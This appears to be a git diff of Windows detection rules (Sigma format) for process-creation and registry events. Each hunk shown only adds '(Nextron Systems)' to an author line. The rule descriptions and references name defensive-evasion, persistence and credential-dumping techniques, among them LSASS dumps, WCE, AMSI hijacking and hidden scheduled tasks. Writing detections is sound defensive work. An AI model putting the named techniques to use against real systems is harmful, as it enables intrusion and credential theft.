a/rules/windows/process_creation/proc_creation_win_wmic_service.yml +++ b/rules/windows/process_creation/proc_creation_win_wmic_service.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of wmic to start or stop a service references: - https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/20 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml b/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml index 4a2df61d5..e04e6a343 100644 --- a/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml +++ b/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml @@ -9,7 +9,7 @@ references: - https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py - https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1 - https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/06/20 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_wpbbin_persistence.yml b/rules/windows/process_creation/proc_creation_win_wpbbin_persistence.yml index 192997634..8dec86498 100644 --- a/rules/windows/process_creation/proc_creation_win_wpbbin_persistence.yml +++ b/rules/windows/process_creation/proc_creation_win_wpbbin_persistence.yml @@ -5,7 +5,7 @@ description: Detects execution of the binary "wpbbin" which is used as part of t references: - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c - https://persistence-info.github.io/Data/wpbbin.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/18 tags: - attack.persistence diff --git a/rules/windows/process_creation/proc_creation_win_wscript_shell_cli.yml b/rules/windows/process_creation/proc_creation_win_wscript_shell_cli.yml index 8180a229c..15ede48b4 100644 --- a/rules/windows/process_creation/proc_creation_win_wscript_shell_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_wscript_shell_cli.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity references: - http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/31 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml b/rules/windows/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml index f5bc9b3f9..4c06960e0 100644 --- a/rules/windows/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml +++ b/rules/windows/process_creation/proc_creation_win_wsl_child_processes_anomalies.yml @@ -8,7 +8,7 @@ description: Detects uncommon or suspicious child processes spawning from a WSL references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/ - https://twitter.com/nas_bench/status/1535431474429808642 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/23 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_wsudo_susp_execution.yml b/rules/windows/process_creation/proc_creation_win_wsudo_susp_execution.yml index 015d42d08..9642bbbfe 100644 --- a/rules/windows/process_creation/proc_creation_win_wsudo_susp_execution.yml +++ b/rules/windows/process_creation/proc_creation_win_wsudo_susp_execution.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc) references: - https://github.com/M2Team/Privexec/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/12/02 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_wusa_susp_cab_extraction.yml b/rules/windows/process_creation/proc_creation_win_wusa_susp_cab_extraction.yml index 31f064b7c..8e1a57014 100644 --- a/rules/windows/process_creation/proc_creation_win_wusa_susp_cab_extraction.yml +++ b/rules/windows/process_creation/proc_creation_win_wusa_susp_cab_extraction.yml @@ -4,7 +4,7 @@ status: experimental description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument which is not longer supported. This could indicate an attacker using an old technique references: - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/04 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml b/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml index 2101f57a3..dc0288a3e 100644 --- a/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml +++ b/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml @@ -5,7 +5,7 @@ description: Detects usage of the "wusa.exe" (Windows Update Standalone Installe references: - https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html - https://www.echotrail.io/insights/search/wusa.exe/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/05 tags: - attack.execution diff --git a/rules/windows/process_creation/proc_creation_win_xordump.yml b/rules/windows/process_creation/proc_creation_win_xordump.yml index e156582ed..b05b1cac1 100644 --- a/rules/windows/process_creation/proc_creation_win_xordump.yml +++ b/rules/windows/process_creation/proc_creation_win_xordump.yml @@ -4,7 +4,7 @@ status: test description: Detects suspicious use of XORDump process memory dumping utility references: - https://github.com/audibleblink/xordump -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/01/28 tags: - attack.defense_evasion diff --git a/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml b/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml index b369a0815..229e23af8 100644 --- a/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml +++ b/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml @@ -5,7 +5,7 @@ description: Detects when an attacker registers a new AMSI provider in order to references: - https://persistence-info.github.io/Data/amsi.html - https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/21 modified: 2022/12/19 tags: diff --git a/rules/windows/registry/registry_add/registry_add_disk_cleanup_handler_new_entry_persistence.yml b/rules/windows/registry/registry_add/registry_add_disk_cleanup_handler_new_entry_persistence.yml index 82894f1c9..8d74e0da0 100644 --- a/rules/windows/registry/registry_add/registry_add_disk_cleanup_handler_new_entry_persistence.yml +++ b/rules/windows/registry/registry_add/registry_add_disk_cleanup_handler_new_entry_persistence.yml @@ -11,7 +11,7 @@ description: | references: - https://persistence-info.github.io/Data/diskcleanuphandler.html - https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/21 tags: - attack.persistence diff --git a/rules/windows/registry/registry_add/registry_add_renamed_sysinternals_eula_accepted.yml b/rules/windows/registry/registry_add/registry_add_renamed_sysinternals_eula_accepted.yml index c0e5aab00..7ad63984a 100644 --- a/rules/windows/registry/registry_add/registry_add_renamed_sysinternals_eula_accepted.yml +++ b/rules/windows/registry/registry_add/registry_add_renamed_sysinternals_eula_accepted.yml @@ -9,7 +9,7 @@ status: experimental description: Detects the "accepteula" key related to sysinternals tools being created from non sysinternals tools references: - Internal Research -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/24 modified: 2022/12/07 tags: diff --git a/rules/windows/registry/registry_add/registry_add_susp_sysinternals_eula_accepted.yml b/rules/windows/registry/registry_add/registry_add_susp_sysinternals_eula_accepted.yml index e441962d1..2ba030176 100644 --- a/rules/windows/registry/registry_add/registry_add_susp_sysinternals_eula_accepted.yml +++ b/rules/windows/registry/registry_add/registry_add_susp_sysinternals_eula_accepted.yml @@ -7,7 +7,7 @@ status: experimental description: Detects the usage of Suspicious Sysinternals Tools such as PsExec, Procdump...etc via the "accepteula" key being added to Registry references: - https://twitter.com/Moti_B/status/1008587936735035392 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/24 tags: - attack.resource_development diff --git a/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml b/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml index aee728d58..ee57fbdae 100644 --- a/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml +++ b/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. Which could indicate an attacker trying to launch an encryption process references: - https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/05 tags: - attack.defense_evasion diff --git a/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml b/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml index 13b30a03d..bf9d4c827 100644 --- a/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml +++ b/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml @@ -6,7 +6,7 @@ references: - https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer - http://woshub.com/how-to-clear-rdp-connections-history/ - https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/10/19 modified: 2022/03/26 tags: diff --git a/rules/windows/registry/registry_delete/registry_delete_removal_index_value_scheduled_task_hide.yml b/rules/windows/registry/registry_delete/registry_delete_removal_index_value_scheduled_task_hide.yml index 486c1ae92..77d0c1f3b 100644 --- a/rules/windows/registry/registry_delete/registry_delete_removal_index_value_scheduled_task_hide.yml +++ b/rules/windows/registry/registry_delete/registry_delete_removal_index_value_scheduled_task_hide.yml @@ -9,7 +9,7 @@ status: experimental description: Detects when the "index" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as "schtasks /query" references: - https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/26 tags: - attack.defense_evasion diff --git a/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml b/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml index 72bd1813c..ac33f7f5b 100644 --- a/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml +++ b/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml @@ -4,7 +4,7 @@ status: experimental description: Sysmon registry detection of a local hidden user account. references: - https://twitter.com/SBousseaden/status/1387530414185664538 -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/05/03 modified: 2022/08/05 tags: diff --git a/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml b/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml index 6bf31e085..3ec4c0129 100644 --- a/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml +++ b/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml @@ -7,7 +7,7 @@ status: test description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018 references: - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/ -author: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community +author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community date: 2018/03/23 modified: 2022/11/27 tags: diff --git a/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml b/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml index ab3b5c255..4c9c69806 100755 --- a/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml +++ b/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml @@ -5,7 +5,7 @@ description: Detects Pandemic Windows Implant references: - https://wikileaks.org/vault7/#Pandemic - https://twitter.com/MalwareJake/status/870349480356454401 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/06/01 modified: 2022/10/09 tags: diff --git a/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml b/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml index 625d0cf95..99265f73f 100755 --- a/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml +++ b/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml @@ -4,7 +4,7 @@ status: test description: Detects the use of Windows Credential Editor (WCE) references: - https://www.ampliasecurity.com/research/windows-credentials-editor/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/12/31 modified: 2021/11/27 tags: diff --git a/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml b/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml index 279985d14..30bb7583b 100644 --- a/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml +++ b/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml @@ -4,7 +4,7 @@ status: test description: Detects NetNTLM downgrade attack references: - https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks -author: Florian Roth, wagga +author: Florian Roth (Nextron Systems), wagga date: 2018/03/20 modified: 2022/11/29 tags: diff --git a/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml b/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml index e0a0c86a4..b2e7385f6 100644 --- a/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml +++ b/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml @@ -7,7 +7,7 @@ references: - https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/ - https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass - https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021] -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/08/30 modified: 2022/01/13 tags: diff --git a/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml b/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml index f0069ff5d..754dc705d 100644 --- a/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml +++ b/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml @@ -8,7 +8,7 @@ description: Detects changes to the Registry in which a monitor program gets reg references: - https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/ - https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2021/02/26 modified: 2022/12/19 tags: diff --git a/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml b/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml index 230d2cc0a..07dac37b7 100755 --- a/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml +++ b/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml @@ -5,7 +5,7 @@ description: Detects the usage and installation of a backdoor that uses an optio references: - https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/ - https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/ -author: Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community +author: Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community date: 2018/03/15 modified: 2022/11/26 tags: diff --git a/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml b/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml index f46485a59..59e7c09b9 100755 --- a/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml +++ b/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml @@ -4,7 +4,7 @@ status: test description: Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories references: - https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/ -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/10/01 modified: 2021/11/27 tags: diff --git a/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml b/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml index 5d8f745cd..c29fea94c 100644 --- a/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml +++ b/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml @@ -5,7 +5,7 @@ description: Detects a method to load DLL via LSASS process using an undocumente references: - https://blog.xpnsec.com/exploring-mimikatz-part-1/ - https://twitter.com/SBousseaden/status/1183745981189427200 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2019/10/16 modified: 2022/04/21 tags: diff --git a/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml b/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml index 5270e6600..1265beba0 100644 --- a/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml +++ b/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml @@ -5,7 +5,7 @@ description: Detects when an attacker adds a new "Debugger" value to the "AeDebu references: - https://persistence-info.github.io/Data/aedebug.html - https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/21 tags: - attack.persistence diff --git a/rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml b/rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml index bc803a81c..8b7acfd1b 100644 --- a/rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml +++ b/rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml @@ -5,7 +5,7 @@ description: Detects changes to the AMSI come server registry key in order disab references: - https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/ - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2023/01/04 tags: - attack.defense_evasion diff --git a/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml b/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml index 8ab969495..c3db5c123 100644 --- a/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml +++ b/rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml @@ -4,7 +4,7 @@ status: experimental description: Detects disabling the CrashDump per registry (as used by HermeticWiper) references: - https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/ -author: Tobias Michalski +author: Tobias Michalski (Nextron Systems) date: 2022/02/24 modified: 2022/08/23 tags: diff --git a/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml b/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml index 83d8ea3cd..0ecc73838 100644 --- a/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml +++ b/rules/windows/registry/registry_set/registry_set_creation_service_susp_folder.yml @@ -7,7 +7,7 @@ status: experimental description: Detect the creation of a service with a service binary located in a suspicious directory references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md -author: Florian Roth, frack113 +author: Florian Roth (Nextron Systems), frack113 date: 2022/05/02 modified: 2022/12/02 tags: diff --git a/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml b/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml index e51e48614..6f3a96e3a 100644 --- a/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml +++ b/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml @@ -4,7 +4,7 @@ status: experimental description: Detect the creation of a service with a service binary located in a uncommon directory references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/05/02 modified: 2022/05/04 tags: diff --git a/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml b/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml index 313a32ba4..5475d1227 100644 --- a/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml +++ b/rules/windows/registry/registry_set/registry_set_cve_2020_1048_new_printer_port.yml @@ -4,7 +4,7 @@ status: test description: Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048 references: - https://windows-internals.com/printdemon-cve-2020-1048/ -author: EagleEye Team, Florian Roth, NVISO +author: EagleEye Team, Florian Roth (Nextron Systems), NVISO date: 2020/05/13 modified: 2022/01/13 tags: diff --git a/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml b/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml index 21bd50330..24abf5a87 100644 --- a/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml +++ b/rules/windows/registry/registry_set/registry_set_defender_exclusions.yml @@ -7,7 +7,7 @@ status: test description: Detects the Setting of Windows Defender Exclusions references: - https://twitter.com/_nullbind/status/1204923340810543109 -author: Christian Burkard +author: Christian Burkard (Nextron Systems) date: 2021/07/06 modified: 2022/11/26 tags: diff --git a/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml b/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml index 002a4aa60..3d8812e8b 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_autologger_sessions.yml @@ -6,7 +6,7 @@ references: - https://twitter.com/MichalKoczwara/status/1553634816016498688 - https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/ - https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/01 modified: 2023/01/18 tags: diff --git a/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml b/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml index 79c8a4842..b8165a4c9 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml @@ -3,7 +3,7 @@ id: ab871450-37dc-4a3a-997f-6662aa8ae0f1 description: Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros status: experimental date: 2022/10/25 -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) references: - https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/ - https://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope diff --git a/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml b/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml index d19be98cf..b49be144c 100644 --- a/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml +++ b/rules/windows/registry/registry_set/registry_set_disabled_microsoft_defender_eventlog.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections references: - https://twitter.com/WhichbufferArda/status/1543900539280293889/photo/2 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2022/07/04 tags: - attack.defense_evasion diff --git a/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml b/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml index e324577e5..f619d2542 100644 --- a/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml +++ b/rules/windows/registry/registry_set/registry_set_disk_cleanup_handler_autorun_persistence.yml @@ -11,7 +11,7 @@ description: | references: - https://persistence-info.github.io/Data/diskcleanuphandler.html - https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/21 modified: 2022/10/21 tags: diff --git a/rules/windows/registry/registry_set/registry_set_dns_serverlevelplugindll.yml b/rules/windows/registry/registry_set/registry_set_dns_serverlevelplugindll.yml index 7e5832f45..bace1b315 100755 --- a/rules/windows/registry/registry_set/registry_set_dns_serverlevelplugindll.yml +++ b/rules/windows/registry/registry_set/registry_set_dns_serverlevelplugindll.yml @@ -4,7 +4,7 @@ status: experimental description: Detects the installation of a plugin DLL via ServerLevelPluginDll parameter in Registry, which can be used to execute code in context of the DNS server (restart required) references: - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83 -author: Florian Roth +author: Florian Roth (Nextron Systems) date: 2017/05/08 modified: 2022/11/26 tags: diff --git a/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml b/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml index 8d9b52fa7..2cbbf9990 100644 --- a/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml +++ b/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml @@ -4,7 +4,7 @@ status: experimental description: Detects applications being added to the "allowed applications" list of exploit guard in order to bypass controlled folder settings references: - https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/05 tags: - attack.defense_evasion diff --git a/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml b/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml index eacc10205..3479e8e7a 100644 --- a/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml +++ b/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml @@ -5,7 +5,7 @@ description: Detects when an attacker adds a new "Debugger" value to the "Hangs" references: - https://persistence-info.github.io/Data/wer_debugger.html - https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/21 tags: - attack.persistence diff --git a/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml b/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml index fe4dba8a2..c87ea7cc4 100644 --- a/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml +++ b/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml @@ -5,7 +5,7 @@ description: Detects when an attacker modifies the registry value of the "hhctrl references: - https://persistence-info.github.io/Data/hhctrl.html - https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/ -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/07/21 tags: - attack.persistence diff --git a/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml b/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml index f6c8144fd..aec89dce7 100644 --- a/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml +++ b/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml @@ -11,7 +11,7 @@ description: | Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique) references: - https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments -author: Nasreddine Bencherchali +author: Nasreddine Bencherchali (Nextron Systems) date: 2022/08/26 tags: - attack.defense_evasion diff --git a/rules/windows/registry/registry_set/registry_set_mal_adwind.yml b/rules/windows/registry/registry_set/registry_set_mal_adwind.yml index d98444493..8792fb280 100644 --- a/rules/windows/registry/registry_set/registry_set_mal_adwind.yml +++ b/rules/windows/registry/registry_set/registry_set_mal_adwind.yml @@ -8,7 +8,7 @@ description: Detects javaw.exe in AppData folder as used by Adwind / JRAT references: - https://www.hybrid-analysis.com/sample/ba86fa0d4b6af2db0656a88b1dd29f36fe362473ae8ad04255c4e52f214a541c?environmentId=100 - https://www.first.org/resources/papers/conf2017/Advanced-Incident-Detection-and-Threat-Hunting-using-Sysmon-and-Splunk.pdf -author: Florian Roth, Tom Ueltschi, Jonhnathan Ribeiro, oscd.community +author: Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community date: 2017/11/10 modified: 2022/11/26 tags: diff --git a/rules/windows/registry/registry_set/registry_set_new_network_provider.yml b/rules/windows/registry/registry_set/registry_set_new_network_provider.yml index ad7d6be77..0e30be43e 100644 --- a/rules/windows/registry/registry_set/registry_set_new_network_provider.yml +++ b/rules/windows/registry/registry_set/registry_set_new_network_provider.yml @@ -8,7 +8,7 @@ description: Detects when an attacker tries to add a new network provider in ord references: - 